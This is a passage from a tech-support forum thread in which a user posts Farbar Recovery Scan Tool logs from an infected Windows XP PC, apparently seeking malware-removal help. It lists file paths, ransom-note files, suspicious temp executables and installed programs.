    2015-01-27 22:42 - 2015-01-27 22:42 - 0000276 _____ () C:\Documents and Settings\RAUL_104\Application Data\HELP_DECRYPT.URL
    2010-09-17 23:40 - 2010-09-17 23:40 - 0087608 _____ () C:\Documents and Settings\RAUL_104\Application Data\inst.exe
    2010-09-17 23:40 - 2010-09-17 23:40 - 0007887 _____ () C:\Documents and Settings\RAUL_104\Application Data\pcouffin.cat
    2010-09-17 23:40 - 2010-09-17 23:40 - 0001144 _____ () C:\Documents and Settings\RAUL_104\Application Data\pcouffin.inf
    2010-09-17 23:41 - 2010-09-17 23:41 - 0000034 _____ () C:\Documents and Settings\RAUL_104\Application Data\pcouffin.log
    2010-09-17 23:40 - 2010-09-17 23:40 - 0047360 _____ (VSO Software) C:\Documents and Settings\RAUL_104\Application Data\pcouffin.sys
    2011-09-03 20:36 - 2011-09-03 20:36 - 0000338 _____ () C:\Documents and Settings\RAUL_104\Application Data\settings.dat
    2010-09-17 23:30 - 2013-08-31 01:36 - 0001057 _____ () C:\Documents and Settings\RAUL_104\Application Data\vso_ts_preview.xml
    2015-01-27 20:15 - 2015-01-27 20:15 - 0000480 ____H () C:\Documents and Settings\RAUL_104\Application Data\&#40637;&#37778;&#39379;&#35228;
    2011-01-26 16:37 - 2014-11-13 17:57 - 0038912 _____ () C:\Documents and Settings\RAUL_104\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
    2015-01-28 10:50 - 2015-01-28 10:50 - 0045601 _____ () C:\Documents and Settings\RAUL_104\Local Settings\Application Data\HELP_DECRYPT.PNG
    2015-01-28 10:50 - 2015-01-28 10:50 - 0000276 _____ () C:\Documents and Settings\RAUL_104\Local Settings\Application Data\HELP_DECRYPT.URL
    2012-04-27 13:38 - 2012-04-27 13:38 - 0000600 _____ () C:\Documents and Settings\RAUL_104\Local Settings\Application Data\PUTTY.RND
    2010-12-16 11:18 - 2010-12-16 11:18 - 0000000 _____ () C:\Documents and Settings\All Users\cmn_upld.log
    2011-01-07 14:36 - 2014-12-28 19:29 - 0144468 _____ () C:\Documents and Settings\All Users\dlea.log
    2014-11-19 17:09 - 2014-11-19 17:23 - 0000248 _____ () C:\Documents and Settings\All Users\dleaDiagnostics.log
    2010-12-20 22:02 - 2014-11-19 16:03 - 0048470 _____ () C:\Documents and Settings\All Users\dleaJSW.log
    2010-12-16 01:45 - 2015-03-28 19:19 - 0783804 _____ () C:\Documents and Settings\All Users\dleascan.log
    2010-12-16 11:30 - 2013-05-30 17:27 - 0000756 _____ () C:\Documents and Settings\All Users\FastPics.log
    2010-12-16 11:18 - 2010-12-16 11:18 - 0000000 _____ () C:\Documents and Settings\All Users\LxWbGwLog.log
    2015-01-25 10:44 - 2015-01-25 10:44 - 0241664 ____N () C:\Documents and Settings\All Users\qicswp.exe
    2010-12-16 01:31 - 2010-12-16 01:31 - 0000000 _____ () C:\Documents and Settings\All Users\UpdaterLog.txt

    Files to move or delete:
    ====================
    C:\Documents and Settings\All Users\qicswp.exe
    C:\Documents and Settings\AMY_106\hpothb07.dat
    C:\Documents and Settings\RAUL_104\msndata.dat
    C:\Documents and Settings\RAUL_104\SIMRecoveryPro.exe


    Some content of TEMP:
    ====================
    C:\Documents and Settings\AMY_106\Local Settings\Temp\GLF3F02.tmp.tbZyng.dll
    C:\Documents and Settings\AMY_106\Local Settings\Temp\Zynga.exe
    C:\Documents and Settings\AMY_1061\Local Settings\Temp\bwgo0004f4bc.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\ARS.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0003a7ab.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0003c209.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo000463c7.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00046965.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo000519e8.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00051e4d.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo000543d6.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo000557bc.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0005a010.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0005c54b.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0005f60f.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00063367.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo000636d2.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00063ad9.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo000655d3.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo000661f8.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00066d82.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00069770.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0006ac6f.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0006c035.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0006d6ab.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00072a59.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00076724.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0007707a.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00077bd5.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0007a7d6.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0007e898.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0007eb29.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0007f0b7.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00083f73.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0008723b.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00088342.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0008c80c.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0008f8e0.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00090b4e.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00090d42.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00092752.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00097bbc.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00099648.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo000b6404.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo000b971a.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo000c7360.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo000de82e.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo000e0fca.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo000e9110.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo000e9e20.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo001011f3.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00102c23.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00103078.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00114999.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0013e15b.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo001739dc.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0018c59d.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo002e4d74.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo0030a4e1.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo00b5f6e2.exe
    C:\Documents and Settings\RAUL_104\Local Settings\Temp\bwgo01b15fb9.exe


    ==================== Bamital & volsnap Check =================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\explorer.exe => MD5 is legit
    C:\WINDOWS\system32\winlogon.exe => MD5 is legit
    C:\WINDOWS\system32\svchost.exe => MD5 is legit
    C:\WINDOWS\system32\services.exe => MD5 is legit
    C:\WINDOWS\system32\User32.dll => MD5 is legit
    C:\WINDOWS\system32\userinit.exe => MD5 is legit
    C:\WINDOWS\system32\rpcss.dll => MD5 is legit
    C:\WINDOWS\system32\Drivers\volsnap.sys => MD5 is legit

    ==================== End Of Log ============================
     
  10. chron104

    chron104 Thread Starter

    Joined:
    Mar 27, 2015
    Messages:
    63
    These are the results of the ADDITION.TXT listed below....

    dditional scan result of Farbar Recovery Scan Tool (x86) Version: 11-03-2015
    Ran by RAUL_104 at 2015-03-28 19:58:55
    Running from C:\Documents and Settings\RAUL_104\My Documents\Downloads
    Boot Mode: Normal
    ==========================================================


    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: AVG update module (Enabled - Up to date) {17DDD097-36FF-435F-9E1B-52D74245D6BF}
    AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {84B5EE75-6421-4CDE-A33A-DD43BA9FAD83}
    FW: McAfee Firewall (Disabled) {94894B63-8C7F-4050-BDA4-813CA00DA3E8}

    ==================== Installed Programs ======================

    (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    "Nero SoundTrax Help (Version: 4.0.15.0 - Nero AG) Hidden
    3ivx MPEG-4 5.0.3 (remove only) (HKLM\...\3ivx MPEG-4 5.0.3) (Version: 5.0.3 - 3ivx Technologies, Pty. Ltd.)
    ABBYY FineReader 11 Corporate Edition (HKLM\...\{F1100000-0010-0000-0000-074957833700}) (Version: 11.0.460 - ABBYY)
    Acrobat.com (HKLM\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
    Adobe AIR (HKLM\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
    Adobe Flash Player 16 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 16.0.0.305 - Adobe Systems Incorporated)
    Adobe Flash Player 17 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 17.0.0.134 - Adobe Systems Incorporated)
    Adobe Reader 9.5.3 (HKLM\...\{AC76BA86-7AD7-1033-7B44-A95000000001}) (Version: 9.5.3 - Adobe Systems Incorporated)
    Advertising Center (Version: 0.0.0.2 - Nero AG) Hidden
    AIM 7 (HKLM\...\AIM_7) (Version: - )
    AnyDVD (HKLM\...\AnyDVD) (Version: - SlySoft)
    Apple Application Support (HKLM\...\{CCE825DB-347A-4004-A186-5F4A6FDD8547}) (Version: 2.3.2 - Apple Inc.)
    Apple Mobile Device Support (HKLM\...\{459699C3-9430-4381-964B-4248D87B49F9}) (Version: 6.0.1.3 - Apple Inc.)
    Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
    ArcSoft MediaImpression 2 (HKLM\...\{210E8562-74DA-4D97-945B-88B2ED9C8028}) (Version: 2.0.15.1073 - ArcSoft)
    ATI AVIVO Codecs (Version: 10.0.0.40103 - ATI Technologies Inc.) Hidden
    ATI Catalyst Install Manager (HKLM\...\{D1AA5A83-E983-0C1B-658F-2B79427B0608}) (Version: 3.0.778.0 - ATI Technologies, Inc.)
    Audacity 1.2.6 (HKLM\...\Audacity_is1) (Version: - )
    AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5751 - AVG Technologies)
    AVG 2015 (Version: 15.0.4306 - AVG Technologies) Hidden
    AVG 2015 (Version: 15.0.5751 - AVG Technologies) Hidden
    AviSynth 2.5 (HKLM\...\AviSynth) (Version: - )
    BearShare (HKLM\...\BearShare) (Version: - Musiclab, LLC)
    BitTorrent (HKLM\...\BitTorrent) (Version: 7.6.1 - BitTorrent Inc.)
    BitZipper 5.1 (HKLM\...\BitZipper_is1) (Version: - Bitberry Software)
    Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
    calibre (HKLM\...\{4BE3B1FB-31C9-4FA4-B7FE-37025785FCE9}) (Version: 0.7.42 - Kovid Goyal)
    ccc-core-static (Version: 2010.0527.1242.20909 - ATI) Hidden
    CCleaner (HKLM\...\CCleaner) (Version: 2.27 - Piriform)
    CloneDVD2 (HKLM\...\CloneDVD2) (Version: - Elaborate Bytes)
    CloneDVDmobile (HKLM\...\CloneDVDmobile) (Version: 1.7.0.0 - SlySoft)
    Collectorz.com Movie Collector (HKLM\...\Collectorz.com Movie Collector) (Version: - )
    Compact Wireless-G USB Adapter (HKLM\...\{F855C3AE-992D-4B84-A09D-07103CDCDAC2}) (Version: - )
    Conexant D850 56K V.9x DFVc Modem (HKLM\...\CNXT_MODEM_PCI_VEN_14F1&DEV_2F20&SUBSYS_200F14F1) (Version: - )
    ConvertXtoDVD 4.1.1.334 (HKLM\...\{DB6AB705-C9BD-40E3-8929-2EA57F36A4FF}_is1) (Version: 4.1.1.334 - )
    Crash Analysis Tool (HKLM\...\{D5F881C2-B134-474E-AA60-B25DD218AE0D}) (Version: 1.00.0001 - Dell)
    Creative MediaSource (HKLM\...\{56F3E1FF-54FE-4384-A153-6CCABA097814}) (Version: - )
    CutePDF Writer 2.8 (HKLM\...\CutePDF Writer Installation) (Version: - )
    Data Lifeguard Diagnostic for Windows (HKLM\...\{75B61CF0-B8A8-46E2-8709-C4A79898AC1D}) (Version: 1.17 - Western Digital Corporation)
    Dell Digital Jukebox Driver (HKLM\...\Dell Digital Jukebox Driver) (Version: - )
    Dell Driver Download Manager (HKU\S-1-5-21-515967899-117609710-839522115-1004\...\309a46b1dc89b774) (Version: 1.1.0.0 - Dell Inc.)
    Dell Media Experience (HKLM\...\{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: - )
    Dell ResourceCD (HKLM\...\{D78653C3-A8FF-415F-92E6-D774E634FF2D}) (Version: - )
    Dell Support (HKLM\...\{43FCA273-9534-40DB-B7C5-D7758875616A}) (Version: 2.1.1.0 - Dell)
    Dell System Detect (HKU\S-1-5-21-515967899-117609710-839522115-1004\...\9204f5692a8faf3b) (Version: 5.6.0.4 - Dell)
    Dell Toolbar (HKLM\...\{09B71986-2AC5-482d-B6CB-42EA34F4F85B}) (Version: 1.8.12.0 - )
    Dell V310-V510 Series (HKLM\...\Dell V310-V510 Series) (Version: - Dell, Inc.)
    DIGOpt (Version: 9.0.0917.2 - Your Company Name) Hidden
    DivX Converter (HKLM\...\{B13A7C41581B411290FBC0395694E2A9}) (Version: 7.1.0 - DivX, Inc.)
    DivX Plus DirectShow Filters (HKLM\...\DivX Plus DirectShow Filters) (Version: - DivX, Inc.)
    DivX Setup (HKLM\...\DivX Setup) (Version: 2.6.1.9 - DivX, LLC)
    DolbyFiles (Version: 2.0 - Nero AG) Hidden
    Download Updater (AOL LLC) (HKLM\...\SoftwareUpdUtility) (Version: - ) <==== ATTENTION
    DVD Decrypter (Remove Only) (HKLM\...\DVD Decrypter) (Version: - )
    EZ Tape Converter 2.0.0 by MixMeister (HKLM\...\EZ Tape Converter by MixMeister_is1) (Version: - MixMeister Technology LLC)
    EZ Vinyl/Tape Converter 4.1 by MixMeister (HKLM\...\EZ Vinyl/Tape Converter by MixMeister_is1) (Version: - MixMeister Technology LLC)
    ffdshow [rev 2583] [2009-01-05] (HKLM\...\ffdshow_is1) (Version: 1.0 - )
    FileZilla Client 3.8.0 (HKU\S-1-5-21-515967899-117609710-839522115-1004\...\FileZilla Client) (Version: 3.8.0 - Tim Kosse)
    FlipShare (HKLM\...\{B1C0D829-FE30-059E-E93F-CDC7A48235C0}) (Version: 5.6.35.0 - Flip Video)
    FreeOCR v5.0 (HKLM\...\freeocr_is1) (Version: - )
    FrostWire 4.21.3 (HKLM\...\FrostWire) (Version: 4.21.3.0 - FrostWire Team)
    FrostWire 5.3.7 (HKLM\...\FrostWire 5) (Version: 5.3.7.0 - FrostWire Team)
    Genetec Omnicast WebClient 4.5 (HKLM\...\{9E930895-D4B9-4424-88F6-B57220DE45DA}) (Version: 4.5.1475.47 - Genetec Inc)
    Google Chrome (HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Google Chrome) (Version: 41.0.2272.101 - Google Inc.)
    Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.6227.252 - Google Inc.)
    Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
    Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden
    Google Update Helper (Version: 1.3.26.9 - Google Inc.) Hidden
    Greeting Card Creator 32 (HKLM\...\Greeting Card Creator 32) (Version: - )
    Haali Media Splitter (HKLM\...\HaaliMkx) (Version: - )
    Harmony Browser Plug-in (HKLM\...\{634F79E1-2A41-4C40-9E8D-89EC740AC9D6}) (Version: 2.0 - Logitech)
    HP Memories Disc (HKLM\...\{B376402D-58EA-45EA-BD50-DD924EB67A70}) (Version: 1.0.4.805 - Hewlett-Packard Company)
    HP Photo and Imaging 2.2 - Scanjet 3970 Series (HKLM\...\{796ADAFF-7C5B-4CED-BA11-55A3644F1E0D}) (Version: 2.2.0000 - {&Tahoma8}Hewlett-Packard)
    ImagXpress (Version: 7.0.74.0 - Nero AG) Hidden
    ImgBurn (HKLM\...\ImgBurn) (Version: 2.4.1.0 - LIGHTNING UK!)
    IMM4 VCM Codec 1.0.0.10 (HKLM\...\IMM4 Codec_is1) (Version: - )
    Intel(R) PRO Network Connections Drivers (HKLM\...\PROSet) (Version: - )
    Internet Explorer (Enable DEP) (HKLM\...\{a9264802-8a7a-40fe-a135-5c6d204aed7a}.sdb) (Version: - )
    iolo technologies' System Mechanic (HKLM\...\{55FD1D5A-7AEF-4DA3-8FAF-A71B2A52FFC7}_is1) (Version: 14.0.1 - iolo technologies, LLC)
    iSyncTunes (HKLM\...\iSyncTunes) (Version: 1.6.0.0 - isynctunes.com)
    iTunes (HKLM\...\{1B6C0E95-182C-48E0-9C4B-4F916308249C}) (Version: 11.0.0.163 - Apple Inc.)
    Java 7 Update 25 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.250 - Oracle)
    Jawbone Updater (HKLM\...\Jawbone Updater) (Version: 0.1 - Jawbone)
    LimeWire 5.1.2 (HKLM\...\LimeWire) (Version: 5.1.2 - Lime Wire, LLC)
    LiveReg (Symantec Corporation) (HKLM\...\LiveReg) (Version: 2.4.1.2056 - Symantec Corporation)
    LiveUpdate 1.90 (Symantec Corporation) (HKLM\...\LiveUpdate) (Version: 1.90.15.0 - Symantec Corporation)
    Logitech Desktop Messenger (HKLM\...\{900B1197-53F5-4F46-A882-2CFFFE2EEDCB}) (Version: 2.52.18 - Logitech, Inc.)
    Logitech Harmony Remote Software 7 (HKLM\...\{5C6F884D-680C-448B-B4C9-22296EE1B206}) (Version: 7.7.0.0 - Logitech)
    Logitech Vid HD (HKLM\...\Logitech Vid) (Version: 7.2 (7240) - Logitech Inc..)
    Logitech Webcam Software (HKLM\...\{C27BC2A2-30DD-4014-B22E-63EB0DB572F9}) (Version: 12.10.1113 - Logitech Inc.)
    Logitech Webcam Software Driver Package (HKLM\...\lvdrivers_12.10) (Version: 12.10.1110 - Logitech Inc.)
    Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
    McAfee AntiVirus Plus (HKLM\...\MSC) (Version: 12.8.992 - McAfee, Inc.)
    McAfee Virtual Technician (HKLM\...\{8F1A20DC-251D-47B0-91B7-DCA2523EE6C9}) (Version: 5.5.2.0 - McAfee, Inc.)
    McAfee Virtual Technician (HKLM\...\McAfee Virtual Technician) (Version: 7.6.0.202 - McAfee, Inc.)
    Menu Templates - Starter Kit (Version: 9.4.6.0 - Nero AG) Hidden
    Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1 (1033)) (Version: - )
    Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM\...\M2698023) (Version: - )
    Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM\...\M2833941) (Version: - )
    Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM\...\M979906) (Version: - )
    Microsoft .NET Framework 2.0 Service Pack 2 (HKLM\...\{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}) (Version: 2.2.30729 - Microsoft Corporation)
    Microsoft .NET Framework 3.0 Service Pack 2 (HKLM\...\{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}) (Version: 3.2.30729 - Microsoft Corporation)
    Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)
    Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
    Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
    Microsoft Automated Troubleshooting Services Shim (HKLM\...\{c9920352-04e6-469d-bab8-e2b9c7c75415}.sdb) (Version: - )
    Microsoft Compression Client Pack 1.0 for Windows XP (HKLM\...\MSCompPackV1) (Version: 1 - Microsoft Corporation)
    Microsoft Easy Assist v2 (HKLM\...\{326957C7-83FD-4550-A59A-849B7B4297DE}) (Version: 8.1.6416.0 - Microsoft Corporation)
    Microsoft Fix it Center (HKLM\...\{B7588D45-AFDC-4C93-9E2E-A100F3554B64}) (Version: 1.0.0100 - Microsoft Corporation)
    Microsoft IntelliPoint 7.0 (HKLM\...\{EF71A531-5B6C-4B20-8D1E-E6379C7FB6D3}) (Version: 7.0.260.0 - Microsoft)
    Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
    Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
    Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
    Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
    Microsoft User-Mode Driver Framework Feature Pack 1.0 (HKLM\...\Wudf01000) (Version: - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft WinUsb 1.0 (HKLM\...\winusb0100) (Version: - Microsoft Corporation)
    MobileMe Control Panel (HKLM\...\{A71D5E81-B967-43DB-93D7-FD31BFB95748}) (Version: 3.1.5.0 - Apple Inc.)
    MotoHelper 2.0.51 Driver 5.1.0 (HKLM\...\MotoHelper) (Version: 2.0.51 - Motorola)
    MotoHelper MergeModules (Version: 1.2.0 - Motorola) Hidden
    Motorola Mobile Drivers Installation 5.1.0 (Version: 5.1.0 - Motorola Inc.) Hidden
    Move Media Player (HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Move Media Player) (Version: - Move Networks)
    Movie DVD Maker 2.7.0827 (HKLM\...\Movie DVD Maker_is1) (Version: - Aone Software)
    Movie Templates - Starter Kit (Version: 9.4.6.0 - Nero AG) Hidden
    Mozilla Firefox 36.0.4 (x86 en-US) (HKLM\...\Mozilla Firefox 36.0.4 (x86 en-US)) (Version: 36.0.4 - Mozilla)
    Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
    MSN (HKLM\...\MSNINST) (Version: 10.50.0679.0 - Microsoft Corporation)
    MSN Messenger 7.0 (HKLM\...\{ABEB838C-A1A7-4C5D-B7E1-8B4314600820}) (Version: 7.0.0820 - Microsoft Corporation)
    MSRedist (Version: 1.0.0.0 - Symantec Corporation) Hidden
    MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
    MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
    MSXML 6.0 Parser (HKLM\...\{A43BF6A5-D5F0-4AAA-BF41-65995063EC44}) (Version: 6.10.1129.0 - Microsoft Corporation)
    MUSICMATCH® Jukebox (HKLM\...\{45EBDA59-D33B-433A-956E-B2F236468B56}) (Version: - )
    My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
    Nero 9 (HKLM\...\{88f5c91c-7766-4bfb-9039-6edd0ff28c10}) (Version: - Nero AG)
    Nero BackItUp 4 (HKLM\...\{73bb6d85-80a3-43e2-a2e6-3d43d2a1b22b}) (Version: - Nero AG)
    PMB (HKLM\...\{B6A98E5F-D6A7-46FB-9E9D-1F7BF443491C}) (Version: 5.3.00.06040 - Sony Corporation)
    PowerDVD (HKLM\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 7.0 - Dell)
    PSP Video 9 4.07 (HKLM\...\PSP Video 9) (Version: 4.07 - Red Kawa)
    QuickTime (HKLM\...\{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}) (Version: 7.73.80.64 - Apple Inc.)
    Remote Control USB Driver (HKLM\...\{8471021C-F529-43DE-84DF-3612E10F58C4}) (Version: 2.3.2.317 - )
    ResumeMaker Professional (HKLM\...\ResumeMaker Professional) (Version: 14 - Individual Software, Inc)
    Safari (HKLM\...\{FA4C2D53-205F-4245-9717-F3761154824D}) (Version: 5.34.57.2 - Apple Inc.)
    Samsung Kies (HKLM\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.5.0.12094_28 - Samsung Electronics Co., Ltd.)
    Samsung Kies (Version: 2.5.0.12094_28 - Samsung Electronics Co., Ltd.) Hidden
    Samsung Mobile phone USB driver Software (HKLM\...\Samsung Mobile phone USB driver) (Version: - )
    SAMSUNG PC Share Manager (HKLM\...\{7F6EB1C8-7492-40F4-A006-3B4863BCF018}) (Version: 1.00.000 - )
    Samsung PC Studio 3 (HKLM\...\{C4A4722E-79F9-417C-BD72-8D359A090C97}) (Version: 3.2.3.90502 - Samsung Electronics Co., Ltd.)
    Samsung PC Studio 3 (Version: 3.0.0.81001 - Samsung Electronics Co., Ltd.) Hidden
    SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.23.0 - SAMSUNG Electronics Co., Ltd.)
    Shared C Run-time for x86 (Version: 10.0.0 - McAfee) Hidden
    ShareIns (Version: 1.00.0000 - Hewlett-Packard) Hidden
    Sharepod 4.0.1.0 (HKLM\...\{085BCFB8-F6FB-4600-AFAB-1F6DBC7F5F99}_is1) (Version: - Macroplant LLC)
    SIM Recovery Pro v1.2.2 (HKLM\...\ST6UNST #1) (Version: - )
    SiteAdvisor (HKLM\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 3.7.199 - McAfee, Inc.)
    Skins (Version: 2010.0527.1242.20909 - ATI) Hidden
    Skype Click to Call (HKLM\...\{B6CF2967-C81E-40C0-9815-C05774FEF120}) (Version: 6.13.13771 - Skype Technologies S.A.)
    Skype™ 6.5 (HKLM\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.5.158 - Skype Technologies S.A.)
    Sony Image Data Suite (HKLM\...\{359FCAA7-B544-4147-AE3B-8C8A526E2427}) (Version: 3.2.00.19080 - Sony Corporation)
    Sound Blaster Audigy 2 (HKLM\...\{E82BF103-904F-49C0-B77F-6EC110B71E87}) (Version: - )
    SoundTrax (Version: 4.4.37.1 - Nero AG) Hidden
    TeamViewer 7 (HKLM\...\TeamViewer 7) (Version: 7.0.12979 - TeamViewer)
